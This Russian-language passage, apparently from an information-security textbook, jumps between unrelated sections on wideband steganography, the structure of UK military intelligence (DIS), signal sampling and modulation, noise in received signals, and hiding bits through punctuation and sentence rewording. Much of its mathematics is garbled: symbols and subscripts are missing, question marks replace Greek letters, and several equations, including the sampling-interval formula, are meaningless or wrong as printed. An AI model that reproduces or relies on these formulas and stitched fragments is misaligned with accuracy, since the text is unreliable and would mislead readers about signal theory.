Основное преимущество широкополосных стеганометодов — это сравнительно высокая устойчивость к искажениям изображения и разного вида атакам, так как скрываемая информация распределена в широкой полосе частот, и ее трудно удалить без полного разрушения контейнера. Искажения стегоизображения увеличивают значение ?Ci и, если |?Ci| > |?Gimi|, то скрытое сообщение не пострадает.
ШВР (DIS)
В штате DIS имеются как военнослужащие, так и гражданские сотрудники (аналитики, ученые и лингвисты). Руководит работой DIS начальник военной разведки (CDI — Chief of Defence Intelligence). На эту должность назначается находящийся на действительной военной службе генерал-полковник любого вида Вооруженных Сил. Начальник военной разведки подчиняется начальнику Штаба по обороне (Chief of the Defence Staff) и постоянному секретарю МО (Permanent Secretary of MOD). Он отвечает за общую координацию военной разведки, ведущейся видами Вооруженных Сил, а также командования отдельных родов войск. Кроме того, он руководит работой DIS в целом и определяет направления разведывательной деятельности в Вооруженных Силах. Начальник военной разведки является заместителем председателя JIC.
Структурно DIS состоит их двух основных частей — управления анализа военной разведки (DIAS — Defence Intelligence Analysis Staff) и управления по разведке и географическим ресурсам (IGRS — Intelligence and Geographic Resource Staff). Кроме того, существуют управления по финансам, персоналу, общему руководству и информационных систем и телекоммуникаций, которые подчинены непосредственно CDI.
Работой управления DIAS руководит гражданский заместитель начальника военной разведки (DCDI — Deputy Chief of Defence Intelligence). Это управление отвечает за глобальную оценку разведывательной информации и стратегическое оповещение. Управление имеет доступ к закрытой информации, поступающей от GCHQ, SIS, Службы безопасности, служб и систем военной разведки. Кроме того, управление использование дипломатические отчеты и самые разные открытые источники.
Управление IGRS возглавляет находящийся на действительной военной службе генерал-лейтенант любого вида Вооруженных Сил, назначаемый на должность директора по общей разведке и географическим ресурсам (DGIGR — Director General Intelligence and Geographic Resources). Под его в состав управления IGRS входят шесть отделов, а также Учебный центр по военной разведке и безопасности (DISC — Defence Intelligence and Security Center) и Агентство военной геодезической разведки (DGIIA — Defence Geographic and Imagery Intelligence Agency).
Сигнал и его описание
Основным элементом рассмотренных каналов утечки информации являются сигналы, совокупность которых, в свою очередь, формирует информационное сообщение. Сообщение может иметь дискретную природу, т.е. состоять из отдельных символов. В этом случае и сигнал составляется из отдельных элементов, и представляет собою дискретную последовательность. Примером может служить передача текста по телеграфу.
Сообщение может представлять собою и непрерывную функцию времени. В простейшем случае эта функция непосредственно используется в качестве сигнала. Так обстоит, например, дело при обычной городской телефонной связи. Для передачи на большие расстояния прибегают к модуляции, к которой и сводится образование сигнала.
Если же при передаче используется непрерывная функция с импульсными или кодовыми методами, то нужно произвести дискретизацию функции по времени, т.е. перейти от функции непрерывного аргумента к функции дискретного аргумента. Эта операция выполняется путем взятия отсчетов функции в определенные дискретные моменты t. В результате функция m(t) заменяется совокупностью мгновенных значений
{ m } = { m(t) }.
Обычно моменты отсчетов располагаются по оси времени равномерно, т.е.
t = k Dt.
Выбор интервала Dt производится на основании теоремы Котельникова, которая гласит:
функция с ограниченным спектром полностью определяется своими значениями, отсчитанными через интервалы
Dt = ½ F,
где F — ширина спектра.
Это положение может применяться и к функциям с неограниченным, но быстро убывающим за пределами интервала F спектром. В таком случае функция восстанавливается по своим отсчетам не точно, но с легко оцениваемым приближением.
Исходное сообщение может представлять собой функцию не одного, а многих аргументов. В этом случае такая функция превращается в функцию m(t), зависящую от одного аргумента. Это осуществляется посредством операции, называемой разверткой. При этом может произойти дискретизация по одному, нескольким или всем аргументам. Примером может послужить образование телевизионного сигнала.
Изображение может быть представлено как B(x, y, t), где x и y — пространственные координаты (координаты плоскости изображения), B — яркость. Время дискретизируется в результате покадровой передачи (Dt = 1/25 с). При обычной строчной развертке координата x (вдоль строки) остается непрерывной, а координата y дискретизируется. Шаг Dy определяется количеством строк развертки. Таким образом, получается функция
m(t) = m(iDy, kDt, vt),
где v — скорость развертки вдоль строки, i — номер строки, k — номер кадра.
До сих пор речь шла о дискретизации по аргументам. Но возможна (а иногда необходима) дискретизация по значениям функции. Предполагается, что функция ограничена, т.е. ее значения лежат в конечном интервале. В таком случае дискретизация состоит в замене несчетного множества возможных значений функции конечным множеством. Обычно дискретные значения располагаются по шкале функции равномерно, так что
m = [m/Dm + ½] Dm,
где скобки обозначают функцию выделения целой части, Dm — шаг квантования.
Понятно, что квантование, заменяющее истинное значение m округленным значением m, вносит погрешность e = m – m.
Однако существенно, что эта погрешность не превосходит половины шага квантования и, следовательно, находится под нашим контролем.
Итак, при импульсной передаче необходима дискретизация по времени, а при кодовой передаче, кроме того, и дискретизация по значениям функции, т.е. квантование.
Рассмотрим вопросы модуляции. Берется некоторая функция
f = f(a, b, c, ..., t),
называемая переносчиком. Величины a, b, c, ... представляют собой в отсутствие модуляции постоянные параметры.
Сущность модуляции состоит в том, что один из параметров получает приращение, пропорциональное передаваемому сообщению, например
a = a + da = a + Da m(t) = a (1 + (Da/a) m(t)),
где da — переменное приращение, Da — постоянная величина, выражающая степень изменения параметра. Если |m(t)| £ 1, то отношение Da/a есть наибольшее относительное изменение параметра a, или глубина модуляции.
Таким же образом может изменяться и любой другой параметр. Если изменяется (модулируется) параметр a, то мы имеем a-модуляцию, если параметр b — b-модуляцию и т.д. Количество возможных видов модуляции при данном переносчике равно количеству его параметров. Так, например, если в качестве переносчика выбрано синусоидальное колебание
f(t) = A sin (wt + y),
то параметрами являются амплитуда A, частота w и начальная фаза y. Каждый из этих параметров можно модулировать, в результате чего получается, соответственно, амплитудная (АМ), частотная (ЧС) и фазовая модуляция ФМ.
Если переносчиком является периодическая последовательность импульсов определенной формы, параметрами являются: амплитуда, длительность, частота следования и фаза. Это дает четыре основные вида импульсной модуляции: амплитудно-импульсная (АИМ), длительностно-импульсная (ДИМ), частотно-импульсная (ЧИМ) и фазово-импульсная (ФИМ). Переход от видеоимпульсов к радиоимпульсам позволяет получить еще два вида модуляции: по частоте и по фазе высокочастотного заполнения.
Возможны, в принципе, многочисленные виды модуляции по параметрам, определяющим форму видеоимпульсов; однако на практике такие виды модуляции пока не применяются.
В качестве переносчика можно воспользоваться не только периодической функцией, но и стационарным случайным процессом. В этом случае в качестве модулируемого параметра можно взять любую числовую характеристику, которая в силу стационарности является, по определению, постоянной (т.е. не зависящей от начала отсчета времени) величиной. Таковы, например, моменты распределения или их Фурье-преобразования. Первый момент, т.е. среднее значение, обычно равен нулю. Второй момент есть функция корреляции, зависящая от временного сдвига t. Фурье-преобразование функции корреляции есть спектр мощности. Второй момент при t = 0 есть просто мощность. Модуляция по мощности представляет собой аналогию амплитудной модуляции. Модуляция по положению спектра на шкале частот в чем-то подобна частотной модуляции.Аналога фазовой модуляции для случайного процесса не существует.
Следует иметь в виду, что мощность, определенная для конечного отрезка реализации случайного процесса, есть случайная величина, флуктуирующая около среднего значения. Тоже относится и к любым другим моментам или их преобразованиям. Поэтому при использовании случайного процесса в качестве переносчика в сигнал с самого начала примешивается специфическая помеха, хотя и не устранимая, но с известными статистическими характеристиками.
Сигналы с помехами
Наряду с полезным сигналом на вход приемника, как правило, действует помеха. Обычно сигнал и помеха взаимодействуют между собой аддитивно, т.е. суммируются. Иногда между ними имеет место и мультипликативное взаимодействие. Таким образом, при достаточно сильных помехах прием полезного сигнала может значительно затруднится или вообще стать невозможным. Поэтому для обеспечения необходимого качества приема необходимо каким-то образом устранить или ослабить воздействие помехи на средство приема.
Исследуем влияние помехи на основные характеристики сигнала при аддитивном их взаимодействии в трех основных случаях.
1. Если сигнал х(t) и помеха х(t) являются квазидетерминированными, то суммарный сигнал х(t) = х(t) + х(t). Предположим, что х(t) и х(t) — импульсы. Тогда спектр суммарного сигнала
S(i?) = S(i?) + S(i?),
где S(i?) и S(i?) спектры соответственно х(t) и х(t).
Энергия суммарного сигнала будет описываться следующим выражением:
E = dt = E + E+ 2E = dt + dt + 2 dt ,
где E — энергия взаимодействия сигнала и помехи.
Если E= 0, то сигнал и помеха ортогональны. Корреляционная функция суммарного сигнала в этом случае имеет следующий вид:
R(?) = dt = R(?) + R(?) + R(?) + R(?)
R(0) + R(0) = E
2. Если сигнал является квазидетерминированным, а помеха случайной, то суммарный сигнал, описываемый выражением х(t) = х(t) + х(t), может рассматриваться, как нестационарный сигнал, у которого математическое ожидание является функцией времени. Сигнал и помеха в этом случае взаимонезависимы, поэтом корреляционная функция суммарного сигнала
2. R(?) = R(?) + R(?)
2.Если сигнал периодический, то R(?) является периодической функцией, а R(¥) = 0. Это используется для выделения периодического сигнала из случайной помехи.
3. Если сигнал и помеха являются случайными, то X(t) = X(t) + X(t). В этом случае плотность вероятности p(x) сигнала X(t) будет равна свертке распределений p(x) и p(х).
Корреляционная функция суммарного сигнала:
R(?) = R(?) + R(?) + R(?) + R(?) + …
Если X(t) и X(t) некоррелированы, то
R(?) = 0 и R(?) = 0
Тогда
R(?) = R(?) + R(?)
Энергетический спектр суммарного сигнала
G(?) = e d? = G(?) + G(?) + G(?) + G(?) + …
Если X(t) и X(t) некоррелированы, то
G(?) = G(?) = 0
Способы борьбы с помехами в значительной мере зависят от их спектра. По относительному спектральному составу различают следующие три вида помех:
высокочастотная с периодом повторений Т значительно меньше времени измерения Т;
с периодом повторения, близким к Т;
низкочастотная с периодом повторения Т, значительно превышающим Т.
Высокочастотную составляющую наиболее целесообразно уменьшать усреднением, если при этом обеспечивается необходимое быстродействие приема информации.
Составляющая с периодом Т » T часто представляет собой помехи с частотой сети. В этом случае помехи уменьшают, применяя фильтры, интегрирование за время, кратное периоду помехи, и осуществляя синфазирование моментов получения информации и перехода помехи через нулевое значение.
Низкочастотная составляющая устраняется обычно способами, разработанными для систематических погрешностей.
Синтаксические методы
К синтаксическим методам лингвистической стеганографии относятся методы изменения пунктуации и методы изменения стиля и структуры текста.
В любом языке существуют случаи, когда правила пунктуации являются неоднозначными и имеют слабое влияние на содержание текста. Например, обе формы перечисления “хлеб, масло и молоко” и “хлеб, масло, молоко” являются допустимыми. Можно использовать тот факт, что выбор таких форм является произвольным и использовать альтернативный выбор для кодирования данных в двоичном виде. Например, если появляется форма перечисления с союзом “и”, то кодируется 1, иначе — 0. Для сокрытия можно также применять сокращения и аббревиатуры.
В любом языке имеется много возможностей для синтаксического сокрытия данных, но они не часто встречаются в типовых текстах. Средняя скорость передачи данных такими методами равна нескольким битам на килобайт текста.
Хотя многие из правил пунктуации являются неоднозначными и избыточными, их противоречивое использование может стать объектов внимания для цензора. Кроме того, существуют случаи, когда изменение пунктуации может сильно изменить содержание текста. Поэтому такой подход должен использоваться с осторожностью.
К синтаксическим методам относятся методы изменения стиля или структуры текста без существенного изменения его значения или тона. Например, предложение “До окончания ночи я буду готовым” можно представить в виде “Я буду готов быстрее, чем ночь закончится”. Такой подход более прозрачен, но возможность его ограничена.
